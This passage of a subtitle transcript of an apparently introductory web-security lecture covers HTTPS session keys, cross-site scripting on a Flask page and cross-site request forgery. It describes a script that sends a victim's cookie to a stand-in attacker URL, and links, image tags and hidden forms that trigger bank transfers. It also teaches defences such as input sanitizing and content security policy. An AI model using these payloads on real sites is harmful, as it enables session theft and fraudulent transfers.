private key. 812 00:42:45,150 --> 00:42:48,900 You see, OK, I see now that Doug wants to initiate a request with me, 813 00:42:48,900 --> 00:42:51,300 and you're going to fulfill the request. 814 00:42:51,300 --> 00:42:53,610 But you're also going to do one other thing. 815 00:42:53,610 --> 00:42:57,420 You're going to set a key. 816 00:42:57,420 --> 00:43:00,270 And you're going to send me back a key, not 817 00:43:00,270 --> 00:43:04,322 your public or private key, a different key, alongside the request that I made. 818 00:43:04,322 --> 00:43:06,780 And you're going to send it back to me using my public key. 819 00:43:06,780 --> 00:43:10,620 So the initial volley of communications back and forth between us 820 00:43:10,620 --> 00:43:13,230 is the same as any other encrypted communication 821 00:43:13,230 --> 00:43:16,140 using public and private keys that we've previously seen. 822 00:43:16,140 --> 00:43:18,270 I send a message to you using your public key. 823 00:43:18,270 --> 00:43:20,040 You decrypt it using your private key. 824 00:43:20,040 --> 00:43:26,340 You respond to me using my public key, and I decrypt it using my private key. 825 00:43:26,340 --> 00:43:28,260 But this is really slow. 826 00:43:28,260 --> 00:43:34,780 If we're just having communications back and forth via mail or even via text, 827 00:43:34,780 --> 00:43:39,210 the difference of a few milliseconds is immaterial. 828 00:43:39,210 --> 00:43:41,450 We don't really notice it. 829 00:43:41,450 --> 00:43:44,757 But on the web, we do notice it, especially 830 00:43:44,757 --> 00:43:46,590 if we're making multiple requests or there's 831 00:43:46,590 --> 00:43:49,680 multiple packets going back and forth and every single one of them 832 00:43:49,680 --> 00:43:51,520 needs to be encrypted. 833 00:43:51,520 --> 00:43:55,650 So beyond this initial volley, public and private key encryption 834 00:43:55,650 --> 00:44:01,360 is no longer needed because it's no longer used, because it's too slow. 835 00:44:01,360 --> 00:44:03,610 We would notice it if we did. 836 00:44:03,610 --> 00:44:09,150 Instead, as I mentioned, the server is going to respond with a key. 837 00:44:09,150 --> 00:44:11,205 And that key is the key to a cipher. 838 00:44:11,205 --> 00:44:14,910 And we've talked about ciphers before and we know that they are reversible. 839 00:44:14,910 --> 00:44:19,350 The particular cipher in question here is something called AES. 840 00:44:19,350 --> 00:44:20,520 But it is just a cipher. 841 00:44:20,520 --> 00:44:21,960 It is reversible. 842 00:44:21,960 --> 00:44:24,360 And the key that you receive is the key that you 843 00:44:24,360 --> 00:44:28,410 are supposed to use to decrypt all future communications. 844 00:44:28,410 --> 00:44:30,060 This key is called the session key. 845 00:44:30,060 --> 00:44:33,360 And you use it to decrypt all future communications 846 00:44:33,360 --> 00:44:37,230 and use it to encrypt all future communications to the server 847 00:44:37,230 --> 00:44:40,350 until the session, so-called, is terminated. 848 00:44:40,350 --> 00:44:43,320 And the session is basically as long as you're on the site 849 00:44:43,320 --> 00:44:46,770 and you haven't logged out or closed the window. 850 00:44:46,770 --> 00:44:48,240 That is the idea of a session. 851 00:44:48,240 --> 00:44:53,685 It is one singular experience with a page 852 00:44:53,685 --> 00:44:57,750 or with a set of pages that are all part of same domain name. 853 00:44:57,750 --> 00:45:00,960 We're just going to use a cipher for the rest of the time that we talk. 854 00:45:00,960 --> 00:45:03,932 Now, this may seem insecure for reasons we've 855 00:45:03,932 --> 00:45:05,640 talked about when we talked about ciphers 856 00:45:05,640 --> 00:45:07,470 and how they are inherently flawed. 857 00:45:07,470 --> 00:45:10,470 Recall that when we were talking about some of the really early ciphers, 858 00:45:10,470 --> 00:45:13,090 those are classic ciphers like Caesar and Vigenere, 859 00:45:13,090 --> 00:45:14,430 those are very easy to break. 860 00:45:14,430 --> 00:45:17,630 AES is much more complex than that. 861 00:45:17,630 --> 00:45:22,080 And the other upside is that this key, like I mentioned, 862 00:45:22,080 --> 00:45:23,910 is only good for a session. 863 00:45:23,910 --> 00:45:29,040 So in the unlikely event that the server chooses a bad key, for example, if we 864 00:45:29,040 --> 00:45:32,490 think about it as if it was Caesar, if they choose a key of zero, 865 00:45:32,490 --> 00:45:35,240 which would be a very bad key, or key of one that doesn't actually 866 00:45:35,240 --> 00:45:40,113 shift the letters at all, even if the key is compromised, 867 00:45:40,113 --> 00:45:41,780 it's only good for a particular session. 868 00:45:41,780 --> 00:45:44,240 That's not a very long amount of time. 869 00:45:44,240 --> 00:45:47,240 But the upside is the ability to encipher 870 00:45:47,240 --> 00:45:49,520 and decipher information is much faster. 871 00:45:49,520 --> 00:45:53,390 If it's reversible, it's pretty quick to do some mathematical manipulation 872 00:45:53,390 --> 00:45:57,140 and transform it into something that looks obscured and gibberish 873 00:45:57,140 --> 00:45:59,240 and to undo that as well. 874 00:45:59,240 --> 00:46:03,020 And so even though public and private keys are-- 875 00:46:03,020 --> 00:46:05,780 we consider effectively unbreakable, like to the point 876 00:46:05,780 --> 00:46:10,040 of it's mathematically untenable to crack a message using 877 00:46:10,040 --> 00:46:11,510 public and private key encryption. 878 00:46:11,510 --> 00:46:16,010 We don't rely on it for SSL because it is impractical to actually expect 879 00:46:16,010 --> 00:46:17,450 communications to go that slowly. 880 00:46:17,450 --> 00:46:19,610 And so we do fall back on these ciphers. 881 00:46:19,610 --> 00:46:24,260 And that really is when you're using secured encrypted communication 882 00:46:24,260 --> 00:46:26,270 via HTTPS. 883 00:46:26,270 --> 00:46:27,980 You're just relying on a cipher that just 884 00:46:27,980 --> 00:46:31,700 happens to be a very, very fancy cipher that should hypothetically 885 00:46:31,700 --> 00:46:36,060 be very difficult to figure out the key to as well. 886 00:46:36,060 --> 00:46:40,280 You may have also seen a few changes in your browser, especially recently. 887 00:46:40,280 --> 00:46:42,170 This screenshot shows a couple of changes 888 00:46:42,170 --> 00:46:48,080 that are designed to warn you when you are not using HTTPS encryption. 889 00:46:48,080 --> 00:46:51,980 And it's not necessary to use HTTPS for every interaction you 890 00:46:51,980 --> 00:46:53,480 have on the internet. 891 00:46:53,480 --> 00:46:56,750 For example, if you are going to a site that is purely informational, 892 00:46:56,750 --> 00:47:00,900 it's just static content, it's just a list of information, there's no login, 893 00:47:00,900 --> 00:47:05,190 there's no buying, there's no clicking on things that might then get tracked, 894 00:47:05,190 --> 00:47:08,280 for example, it's not really necessary to use HTTPS. 895 00:47:08,280 --> 00:47:11,630 So don't be necessarily alarmed if you visit a site 896 00:47:11,630 --> 00:47:14,180 and your warned it's not secure. 897 00:47:14,180 --> 00:47:17,480 We're told that over time this will turn red and become perhaps even 898 00:47:17,480 --> 00:47:19,950 more concerning as more versions of this come out 899 00:47:19,950 --> 00:47:23,850 and as more and more adopters of HTTPS exist as well. 900 00:47:23,850 --> 00:47:25,850 But you're going to start getting notifications. 901 00:47:25,850 --> 00:47:27,725 And you may have seen these as well in green. 902 00:47:27,725 --> 00:47:29,870 If you are using HTTPS and you log into something, 903 00:47:29,870 --> 00:47:33,120 you'll see a little lock icon here and you'll be told that it is secure. 904 00:47:33,120 --> 00:47:35,570 And again, this is just because human beings 905 00:47:35,570 --> 00:47:40,460 tend not to be as concerned about their digital privacy 906 00:47:40,460 --> 00:47:43,430 and their digital security when using the internet. 907 00:47:43,430 --> 00:47:48,260 And now the technology is trying to provide clues and tips 908 00:47:48,260 --> 00:47:54,880 to entice you to be more concerned about these things. 909 00:47:54,880 --> 00:47:57,330 Now let's take a look at a couple of attacks 910 00:47:57,330 --> 00:47:59,640 that are derived from things we typically consider 911 00:47:59,640 --> 00:48:02,130 to be advantages of using the internet. 912 00:48:02,130 --> 00:48:07,050 The first of these is the idea of cross-site scripting, XSS. 913 00:48:07,050 --> 00:48:09,450 We've previously discussed this idea of the distinction 914 00:48:09,450 --> 00:48:11,700 between server-side code and client-side code. 915 00:48:11,700 --> 00:48:14,400 Client-side code, recall, is something that runs locally 916 00:48:14,400 --> 00:48:16,710 on our computer where our browser, for example, 917 00:48:16,710 --> 00:48:19,380 is expected to interpret and execute that code. 918 00:48:19,380 --> 00:48:22,000 Server-side code is run on the server. 919 00:48:22,000 --> 00:48:25,060 And when we get information from a server, 920 00:48:25,060 --> 00:48:27,630 we're not getting back the actual lines of code. 921 00:48:27,630 --> 00:48:31,028 We're getting back the output of that code having run in the first place. 922 00:48:31,028 --> 00:48:34,320 So for example, there might be some code on the server, some Python code or PHP 923 00:48:34,320 --> 00:48:38,220 code that generates HTML for us. 924 00:48:38,220 --> 00:48:42,570 The actual Python or PHP code in this example would be server-side code. 925 00:48:42,570 --> 00:48:44,430 We don't actually ever see that code. 926 00:48:44,430 --> 00:48:46,890 We only see the output of that code. 927 00:48:46,890 --> 00:48:50,550 A cross-site script vulnerability exists when 928 00:48:50,550 --> 00:48:57,180 an adversary is able to trick a client's browser to run something locally. 929 00:48:57,180 --> 00:49:01,860 And it will do something that presumably the person, the client, 930 00:49:01,860 --> 00:49:04,965 didn't actually intend to do. 931 00:49:04,965 --> 00:49:07,590 Let's take a look at an example of this using a very simple web 932 00:49:07,590 --> 00:49:09,150 server called Flask. 933 00:49:09,150 --> 00:49:10,575 We have here some Python code. 934 00:49:10,575 --> 00:49:13,200 And don't be too worried if this doesn't all make sense to you. 935 00:49:13,200 --> 00:49:20,050 It's just a pretty short, simple web server that does two things. 936 00:49:20,050 --> 00:49:22,170 So this is just some bookkeeping stuff in Flask. 937 00:49:22,170 --> 00:49:26,460 And Flask is a package of Python that is used to create web servers. 938 00:49:26,460 --> 00:49:29,100 This web server has two things, though, that it does. 939 00:49:29,100 --> 00:49:34,350 The first is when I visit slash on my web server-- 940 00:49:34,350 --> 00:49:36,750 so let's say this is Doug's site. 941 00:49:36,750 --> 00:49:41,912 If I go to dougssite.com, which you may not actually explicitly type anymore 942 00:49:41,912 --> 00:49:43,620 but most browsers just add it, slash just 943 00:49:43,620 --> 00:49:47,730 means the root page of your server. 944 00:49:47,730 --> 00:49:50,430 I'm going to call the following function whose name happens 945 00:49:50,430 --> 00:49:52,440 to be called index in this case. 946 00:49:52,440 --> 00:49:53,970 Return hello world. 947 00:49:53,970 --> 00:49:58,770 And what this basically means is if I visit dougspage.com/, 948 00:49:58,770 --> 00:50:05,730 what I receive is an HTML page whose content is just hello world. 949 00:50:05,730 --> 00:50:09,060 So it's just an HTML file that says hello world. 950 00:50:09,060 --> 00:50:11,730 Again, this code here is all server-side code. 951 00:50:11,730 --> 00:50:14,130 You don't actually see this code. 952 00:50:14,130 --> 00:50:18,933 You only see the output of this code, which is this here, this HTML. 953 00:50:18,933 --> 00:50:21,100 It's just a simple string in this case, but it would 954 00:50:21,100 --> 00:50:25,080 be interpreted by the browser as HTML. 955 00:50:25,080 --> 00:50:27,920 If, however, I get a 404-- 956 00:50:27,920 --> 00:50:31,470 a 404 is a not found error. it means the page I requested doesn't exist. 957 00:50:31,470 --> 00:50:35,370 And since I've only defined the behavior for literally one page, 958 00:50:35,370 --> 00:50:41,790 slash the index page of my server, then I want to call this function not found. 959 00:50:41,790 --> 00:50:46,590 Return not found plus whatever page I tried to visit. 960 00:50:46,590 --> 00:50:50,550 So it basically is another very simple page, much like hello world here, 961 00:50:50,550 --> 00:50:53,980 where instead of saying hello world, it says not found. 962 00:50:53,980 --> 00:50:57,560 And then it also concatenates onto the very end of that whatever page 963 00:50:57,560 --> 00:50:59,760 I tried to visit. 964 00:50:59,760 --> 00:51:03,960 This is a major cross-site scripting vulnerability. 965 00:51:03,960 --> 00:51:05,640 And let's see why. 966 00:51:05,640 --> 00:51:10,920 Let's imagine I go to /foo, so dougspage/com/foo. 967 00:51:10,920 --> 00:51:14,130 Recall that our error handler function, which I've reproduced down here, 968 00:51:14,130 --> 00:51:17,330 will return not found /foo. 969 00:51:17,330 --> 00:51:18,330 Seems pretty reasonable. 970 00:51:18,330 --> 00:51:22,260 It seems like the behavior I expected or intended to have happen. 971 00:51:22,260 --> 00:51:24,970 But what about if I go to a page like this one? 972 00:51:24,970 --> 00:51:29,490 So this is what I literally type in the browser, dougspage.com/ angle bracket, 973 00:51:29,490 --> 00:51:36,450 script, angle bracket alert(hi) and then a closed script tag there. 974 00:51:36,450 --> 00:51:42,770 This script here, script here, looks a lot like HTML. 975 00:51:42,770 --> 00:51:47,640 And in fact, when the browser sees this, it will interpret it as HTML. 976 00:51:47,640 --> 00:51:53,340 And so I will get returned by visiting this page not found And then everything 977 00:51:53,340 --> 00:51:57,150 here except for the leading slash, which means 978 00:51:57,150 --> 00:52:02,550 that when I receive this and my client is interpreting the HTML, 979 00:52:02,550 --> 00:52:05,502 I'm going to generate an alert. 980 00:52:05,502 --> 00:52:06,210 What is an alert? 981 00:52:06,210 --> 00:52:09,025 Well, if you've ever gone to a website and had a pop-up box display 982 00:52:09,025 --> 00:52:11,400 some information, you have to click OK or click X to make 983 00:52:11,400 --> 00:52:13,590 it go away, that's what an alert is. 984 00:52:13,590 --> 00:52:16,350 So I visit this page on my website, I've actually 985 00:52:16,350 --> 00:52:21,330 tricked my browser into giving me a JavaScript alert, 986 00:52:21,330 --> 00:52:23,850 or I've tricked whoever visits this page's browser 987 00:52:23,850 --> 00:52:26,070 to give me a JavaScript alert. 988 00:52:26,070 --> 00:52:29,980 So that's probably not exactly a good thing. 989 00:52:29,980 --> 00:52:33,540 But it can get a little bit more nefarious than that. 990 00:52:33,540 --> 00:52:36,670 Let's instead imagine-- instead of having this be on my server, 991 00:52:36,670 --> 00:52:41,250 it might be easier to imagine it like this, that this is what I wrote. 992 00:52:41,250 --> 00:52:45,698 This script tag here's what I wrote into my Facebook profile, for example. 993 00:52:45,698 --> 00:52:48,240 So Facebook gives you the ability to write a short little bio 994 00:52:48,240 --> 00:52:49,500 about yourself. 995 00:52:49,500 --> 00:52:54,927 Let's imagine that my bio was this script document.write, image source, 996 00:52:54,927 --> 00:52:56,760 and then I have a hacker URL and everything. 997 00:52:56,760 --> 00:52:58,760 And imagine that I own hacker URL. 998 00:52:58,760 --> 00:53:04,800 So I own hacker URL and I wrote this in my Facebook profile. 999 00:53:04,800 --> 00:53:08,010 Assuming that Facebook did not defend against cross-site scripting 1000 00:53:08,010 --> 00:53:11,740 attacks, which they do, but assuming that they did not, 1001 00:53:11,740 --> 00:53:15,540 anytime somebody visited my profile, their browser 1002 00:53:15,540 --> 00:53:19,810 would be forced to contend with this script tag here. 1003 00:53:19,810 --> 00:53:20,310 Why? 1004 00:53:20,310 --> 00:53:22,590 Because they're trying to visit my profile page. 1005 00:53:22,590 --> 00:53:26,610 My profile page contains literally these characters which 1006 00:53:26,610 --> 00:53:29,540 are going to be interpreted as HTML. 1007 00:53:29,540 --> 00:53:33,990 And it's going to add document.write-- that's a JavaScript way of saying add 1008 00:53:33,990 --> 00:53:38,490 the following line in addition to the HTML of the page-- 1009 00:53:38,490 --> 00:53:44,700 image source equals hacker url?cookie= and then document.cookie. 1010 00:53:44,700 --> 00:53:48,210 So imagine that I, again, control hacker URL. 1011 00:53:48,210 --> 00:53:50,730 Presumably, as somebody who is running a website, 1012 00:53:50,730 --> 00:53:54,810 I also maintain logs of every time somebody tries to access my website, 1013 00:53:54,810 --> 00:53:57,960 what page on my site they're trying to visit. 1014 00:53:57,960 --> 00:54:00,690 If somebody goes to my Facebook profile and executes this, 1015 00:54:00,690 --> 00:54:06,270 I'm going to get notified via my hacker URL logs that somebody has tried to go 1016 00:54:06,270 --> 00:54:12,560 to that page ?cookie= and then document.cookie. 1017 00:54:12,560 --> 00:54:14,910 Now, document.cookie in this case, because this 1018 00:54:14,910 --> 00:54:21,670 exists on my Facebook profile, is an individual's cookie for Facebook. 1019 00:54:21,670 --> 00:54:24,000 So here what I am doing-- again, Facebook 1020 00:54:24,000 --> 00:54:26,310 does defend against cross-site scripting attacks, 1021 00:54:26,310 --> 00:54:28,230 so this can't actually happen on Facebook. 1022 00:54:28,230 --> 00:54:31,980 But assuming that they did not defend against them adequately, 1023 00:54:31,980 --> 00:54:36,210 what I'm basically doing is getting told via my log 1024 00:54:36,210 --> 00:54:38,520 that somebody tried to visit some page on my URL, 1025 00:54:38,520 --> 00:54:41,400 but the page that they tried to visit, I'm 1026 00:54:41,400 --> 00:54:46,170 plugging in and basically stealing the cookie that they use for Facebook. 1027 00:54:46,170 --> 00:54:48,873 And a cookie, recall, is sort of like a hand stamp. 1028 00:54:48,873 --> 00:54:50,790 It's basically me, instead of having to re-log 1029 00:54:50,790 --> 00:54:53,602 into Facebook every time I want to use it, going up to Facebook 1030 00:54:53,602 --> 00:54:54,310 and saying, here. 1031 00:54:54,310 --> 00:54:56,070 You've already verified my identity. 1032 00:54:56,070 --> 00:54:59,040 Just take a look at this, and you get let in. 1033 00:54:59,040 --> 00:55:04,920 And now I hypothetically know someone else's Facebook cookie. 1034 00:55:04,920 --> 00:55:07,890 And if I was clever, I could try and use that 1035 00:55:07,890 --> 00:55:12,060 to change what my Facebook cookie is to that person's Facebook cookie. 1036 00:55:12,060 --> 00:55:17,220 And then suddenly I'm able to log in and view their profile and act as them. 1037 00:55:17,220 --> 00:55:19,290 This image tag here is just a clever trick 1038 00:55:19,290 --> 00:55:24,150 because the idea is that it's trying to pull some resource from my site. 1039 00:55:24,150 --> 00:55:25,060 It doesn't exist. 1040 00:55:25,060 --> 00:55:27,270 I don't have a list of all the cookies on Facebook. 1041 00:55:27,270 --> 00:55:32,040 But I'm being told that somebody is trying to access this URL on my site. 1042 00:55:32,040 --> 00:55:34,950 So the image tag is just sort of a trick to force 1043 00:55:34,950 --> 00:55:38,760 it to log something on my hacker URL. 1044 00:55:38,760 --> 00:55:43,170 But the idea here is that I would be able to steal somebody's Facebook 1045 00:55:43,170 --> 00:55:47,610 cookie where this attack's not well-defended against. 1046 00:55:47,610 --> 00:55:51,960 So what techniques can we use either for our own sites 1047 00:55:51,960 --> 00:55:55,980 when we are running to avoid cross-site scripting vulnerabilities 1048 00:55:55,980 --> 00:56:01,270 or to protect against cross-site scripting vulnerabilities? 1049 00:56:01,270 --> 00:56:04,770 The first technique that we can use is to sanitize, so to speak, 1050 00:56:04,770 --> 00:56:08,400 all of the inputs that come in to our page. 1051 00:56:08,400 --> 00:56:10,610 So let's take a look at how exactly we might do this. 1052 00:56:10,610 --> 00:56:13,500 So it turns out that there are things called 1053 00:56:13,500 --> 00:56:19,080 HTML entities, which are other ways of representing certain characters in HTML 1054 00:56:19,080 --> 00:56:22,950 that might be considered special or control characters, so things like, 1055 00:56:22,950 --> 00:56:26,460 for example, this or this. 1056 00:56:26,460 --> 00:56:29,610 Typically, when a browser sees a character left 1057 00:56:29,610 --> 00:56:31,770 angle bracket or right angle bracket, it's 1058 00:56:31,770 --> 00:56:37,740 going to automatically interpret that as some HTML that it should then process. 1059 00:56:37,740 --> 00:56:39,930 So in the example I just showed a moment ago, 1060 00:56:39,930 --> 00:56:44,130 I was using the fact that whenever it sees angle brackets with script 1061 00:56:44,130 --> 00:56:47,050 around it, they're going to try and interpret whatever 1062 00:56:47,050 --> 00:56:49,470 is between those tags as a script. 1063 00:56:49,470 --> 00:56:52,920 One way for me to prevent that from being interpreted as a script 1064 00:56:52,920 --> 00:56:58,800 is to call this or call this something else other than just left angle bracket 1065 00:56:58,800 --> 00:57:00,130 and right angle bracket. 1066 00:57:00,130 --> 00:57:03,780 And it turns out that there are these things called HTML entities that 1067 00:57:03,780 --> 00:57:08,250 can be used to refer to these characters instead, 1068 00:57:08,250 --> 00:57:13,440 such that if I sanitize my input in such a way 1069 00:57:13,440 --> 00:57:20,278 that every time somebody literally typed the character left angle bracket, 1070 00:57:20,278 --> 00:57:23,070 I had written some code that automatically took that and changed it 1071 00:57:23,070 --> 00:57:25,470 into ampersand lt;. 1072 00:57:25,470 --> 00:57:29,440 And then every time somebody wrote a greater than character, 1073 00:57:29,440 --> 00:57:35,670 or right angle bracket, I changed that in the code to ampersand gt;. 1074 00:57:35,670 --> 00:57:40,170 Then when my page was responsible for processing or interpreting something, 1075 00:57:40,170 --> 00:57:44,640 it wouldn't interpret this-- it would still display this character as a left 1076 00:57:44,640 --> 00:57:47,580 angle bracket or less than-- that's what the lt stands for here-- 1077 00:57:47,580 --> 00:57:49,290 or a right angle bracket, greater than. 1078 00:57:49,290 --> 00:57:52,210 That's what the gt stands for there. 1079 00:57:52,210 --> 00:57:55,960 It would literally just show those characters and not treat them as HTML. 1080 00:57:55,960 --> 00:58:00,030 So that's the idea of what it means to sanitize input when we're talking 1081 00:58:00,030 --> 00:58:04,510 about HTML entities, for example. 1082 00:58:04,510 --> 00:58:08,160 Another thing that we could do is just disable JavaScript entirely. 1083 00:58:08,160 --> 00:58:10,290 This would have some upsides and some downsides. 1084 00:58:10,290 --> 00:58:13,440 The upside is you're pretty protected against cross-site scripting 1085 00:58:13,440 --> 00:58:17,820 vulnerabilities because they're usually going to be introduced via JavaScript. 1086 00:58:17,820 --> 00:58:20,100 The downside is JavaScript is pretty convenient. 1087 00:58:20,100 --> 00:58:20,670 It's nice. 1088 00:58:20,670 --> 00:58:22,770 It makes for a better user experience. 1089 00:58:22,770 --> 00:58:24,930 Sometimes there might be parts of our page 1090 00:58:24,930 --> 00:58:29,040 that just don't work if JavaScript is completely disabled, 1091 00:58:29,040 --> 00:58:30,540 and so trade-offs there. 1092 00:58:30,540 --> 00:58:33,360 You're protecting yourself, but you might be doing 1093 00:58:33,360 --> 00:58:37,050 other sorts of non-material damage. 1094 00:58:37,050 --> 00:58:40,142 Or we could decide to just handle the JavaScript in a special way. 1095 00:58:40,142 --> 00:58:41,850 So for example, we might not allow what's 1096 00:58:41,850 --> 00:58:44,940 called inline JavaScript, for example, like the script tags 1097 00:58:44,940 --> 00:58:46,470 that I just showed a moment ago. 1098 00:58:46,470 --> 00:58:50,010 But we might allow JavaScripts written in separate JavaScript files 1099 00:58:50,010 --> 00:58:52,870 which can also be linked into your HTML pages. 1100 00:58:52,870 --> 00:58:56,280 So those would be allowed, but inline JavaScript, like what we just saw, 1101 00:58:56,280 --> 00:58:57,690 would not be allowed. 1102 00:58:57,690 --> 00:59:01,890 We could sandbox the JavaScript and run it separately somewhere else first 1103 00:59:01,890 --> 00:59:06,210 to see if it does something weird, and if it doesn't do something weird, 1104 00:59:06,210 --> 00:59:08,580 then allow it to be displayed. 1105 00:59:08,580 --> 00:59:12,390 We could also execute the content security policy. 1106 00:59:12,390 --> 00:59:15,570 Content security policy is another header 1107 00:59:15,570 --> 00:59:20,370 that we can add to our HTML pages or HTTP responses. 1108 00:59:20,370 --> 00:59:22,350 And we can define certain behavior to happen 1109 00:59:22,350 --> 00:59:25,800 such that will allow certain lines or certain types of JavaScript through 1110 00:59:25,800 --> 00:59:28,167 but not others. 1111 00:59:28,167 --> 00:59:30,000 Now, there's another type of attack that can 1112 00:59:30,000 --> 00:59:34,800 be used that relies heavily on the fact that we use cookies so extensively, 1113 00:59:34,800 --> 00:59:40,650 and that is a cross-site request forgery, or a CSRF. 1114 00:59:40,650 --> 00:59:43,680 Now, cross-eyed scripting attacks generally 1115 00:59:43,680 --> 00:59:48,840 involve receiving some content and the client's browser 1116 00:59:48,840 --> 00:59:53,610 being tricked into doing something locally that it didn't want to do. 1117 00:59:53,610 --> 00:59:58,170 In a CSRF request, or CSRF attack, rather, 1118 00:59:58,170 --> 01:00:02,430 the trick is we're relying on the fact that there 1119 01:00:02,430 --> 01:00:04,980 is a cookie that can be exploited to make 1120 01:00:04,980 --> 01:00:11,595 a an outbound request, an outbound HTTP request that we did not intend to make. 1121 01:00:11,595 --> 01:00:13,470 And again, this relies extensively on cookies 1122 01:00:13,470 --> 01:00:18,300 because they are this shorthand, short-form way to log into something. 1123 01:00:18,300 --> 01:00:22,230 And we can make a fraudulent request appear legitimate 1124 01:00:22,230 --> 01:00:24,480 if we can rely on someone's cookie. 1125 01:00:24,480 --> 01:00:28,110 Now, again, if you ever use a cloud service for example, 1126 01:00:28,110 --> 01:00:31,560 they're going to have CSRF defenses built into them. 1127 01:00:31,560 --> 01:00:33,780 This is really if you're building a simple site 1128 01:00:33,780 --> 01:00:35,368 and you don't defend against this. 1129 01:00:35,368 --> 01:00:38,160 Flask, for example, does not defend against this particularly well, 1130 01:00:38,160 --> 01:00:40,568 but Flask is a very simple web framework for servers. 1131 01:00:40,568 --> 01:00:43,110 They're generally going to be much more complicated than that 1132 01:00:43,110 --> 01:00:46,620 and have much more additional functionality to be more featurefull. 1133 01:00:46,620 --> 01:00:48,840 So let's walk through what these cross-site request 1134 01:00:48,840 --> 01:00:50,280 forgeries might look like. 1135 01:00:50,280 --> 01:00:53,820 And for context, let's imagine that I send you an email 1136 01:00:53,820 --> 01:00:56,137 asking you to click on some URL. 1137 01:00:56,137 --> 01:00:57,720 So you're going to click on this link. 1138 01:00:57,720 --> 01:00:59,820 It's going to redirect you to some page. 1139 01:00:59,820 --> 01:01:02,310 Maybe that page looks something like this. 1140 01:01:02,310 --> 01:01:04,470 It's pretty simple, not much going on here. 1141 01:01:04,470 --> 01:01:05,320 I have a body. 1142 01:01:05,320 --> 01:01:07,500 And inside of it I have one more link. 1143 01:01:07,500 --> 01:01:15,422 And the link is http://hackbank.com/ transfertodoug=amt500. 1144 01:01:15,422 --> 01:01:18,630 Now, perhaps you don't hover over it and see the link at the beginning of it. 1145 01:01:18,630 --> 01:01:20,960 But maybe you are a customer of Hack Bank. 1146 01:01:20,960 --> 01:01:24,480 And maybe I know that you're a customer of Hack Bank such that if you click 1147 01:01:24,480 --> 01:01:28,290 on this link and if you happen to be logged in, and if you happen to have 1148 01:01:28,290 --> 01:01:32,730 your cookie set for hackbank.com, and this was the way that they actually 1149 01:01:32,730 --> 01:01:37,650 executed transfers, by having you go to /transfer and say to whom you want 1150 01:01:37,650 --> 01:01:40,200 to send money and in what amount-- 1151 01:01:40,200 --> 01:01:42,938 And fortunately, most banks don't actually do this. 1152 01:01:42,938 --> 01:01:46,230 Usually, if you're going to do something that manipulates the database, as this 1153 01:01:46,230 --> 01:01:48,938 would, because it's going to be transferring some amount of money 1154 01:01:48,938 --> 01:01:51,930 somewhere that would be via HTTP POST request-- 1155 01:01:51,930 --> 01:01:55,530 this is just a straightforward GET request I'm making here. 1156 01:01:55,530 --> 01:01:57,722 If you were logged in, though, to Hack Bank, 1157 01:01:57,722 --> 01:01:59,430 or if you're cookie for Hack Bank was set 1158 01:01:59,430 --> 01:02:03,555 and you clicked on this link, hypothetically, a transfer of $500-- 1159 01:02:03,555 --> 01:02:05,430 again, assuming that this was how you did it, 1160 01:02:05,430 --> 01:02:07,740 you specified a person and you specified an amount-- 1161 01:02:07,740 --> 01:02:13,288 would be transferred from your account to presumably my account. 1162 01:02:13,288 --> 01:02:15,330 That's probably not something you intended to do. 1163 01:02:15,330 --> 01:02:18,867 So that would be an example of why this is a cross-site request forgery. 1164 01:02:18,867 --> 01:02:19,950 It's a legitimate request. 1165 01:02:19,950 --> 01:02:23,130 It appears that you intended to do this because it came from you. 1166 01:02:23,130 --> 01:02:24,330 It's using your cookie. 1167 01:02:24,330 --> 01:02:28,090 But you didn't actually intend for it to happen. 1168 01:02:28,090 --> 01:02:29,460 Here's another example. 1169 01:02:29,460 --> 01:02:32,260 You click on the link in my email and you get brought to this page. 1170 01:02:32,260 --> 01:02:35,250 So there's not actually even a second link to click anymore. 1171 01:02:35,250 --> 01:02:37,410 Now it's just trying to load an image. 1172 01:02:37,410 --> 01:02:40,660 Now, looking at this URL, we can tell there's not an image there. 1173 01:02:40,660 --> 01:02:43,920 It doesn't end in jpeg or .pmg or the like. 1174 01:02:43,920 --> 01:02:45,540 It's the same URL as before. 1175 01:02:45,540 --> 01:02:49,397 But my browser sees image source equals something and says, 1176 01:02:49,397 --> 01:02:51,480 well, I'm at least going to try and go to that URL 1177 01:02:51,480 --> 01:02:55,040 and see if there is an image there to load for you. 1178 01:02:55,040 --> 01:02:57,710 Again, you just click on the link in the email. 1179 01:02:57,710 --> 01:03:00,140 This page loads. 1180 01:03:00,140 --> 01:03:03,320 My browser tries to go to this page, or your browser in this case 1181 01:03:03,320 --> 01:03:06,230 tries to go to this page to load the image there. 1182 01:03:06,230 --> 01:03:10,910 But in so doing, it's, again, executing this unintended transfer, 1183 01:03:10,910 --> 01:03:14,750 relying on your cookie at hackbank.com. 1184 01:03:14,750 --> 01:03:17,120 Another example of this might be a form. 1185 01:03:17,120 --> 01:03:20,120 So again, it appears that you click on the link in the email. 1186 01:03:20,120 --> 01:03:23,870 You get brought to a form that just has now just a button at the bottom of it 1187 01:03:23,870 --> 01:03:24,892 that says Click Here. 1188 01:03:24,892 --> 01:03:26,600 And the reason it just has a button, even 1189 01:03:26,600 --> 01:03:31,990 though there's other stuff written, is that those first two fields are hidden. 1190 01:03:31,990 --> 01:03:35,000 They are type equals hidden, which means you wouldn't actually 1191 01:03:35,000 --> 01:03:37,040 see them when you load your browser. 1192 01:03:37,040 --> 01:03:40,160 Now, contrast this, for example, with a field 1193 01:03:40,160 --> 01:03:43,340 whose type is text, which you might see if you're doing a straightforward 1194 01:03:43,340 --> 01:03:44,090 login. 1195 01:03:44,090 --> 01:03:48,020 You would type characters in and see the actual characters appear. 1196 01:03:48,020 --> 01:03:50,660 That's text versus a password field where you would 1197 01:03:50,660 --> 01:03:52,580 type characters in and see all stars. 1198 01:03:52,580 --> 01:03:55,640 It would visually obscure what you typed. 1199 01:03:55,640 --> 01:03:58,760 The action of this form, or so to say where 1200 01:03:58,760 --> 01:04:02,313 the form-- what happens when you click on the Submit button at the bottom 1201 01:04:02,313 --> 01:04:03,230 is the same as before. 1202 01:04:03,230 --> 01:04:06,140 It's hackbank.com/transfer. 1203 01:04:06,140 --> 01:04:07,970 And then I'm using these parameters here; 1204 01:04:07,970 --> 01:04:13,550 to Doug, the amount of $500, Click Here. 1205 01:04:13,550 --> 01:04:17,090 Now I actually am using a notice also POST request 1206 01:04:17,090 --> 01:04:19,500 to try to initiate this transfer, again, assuming 1207 01:04:19,500 --> 01:04:24,380 that this was how Hack Bank structured transfer requests in this way. 1208 01:04:24,380 --> 01:04:27,650 So if you clicked here and this was otherwise validly structured 1209 01:04:27,650 --> 01:04:31,340 and you were 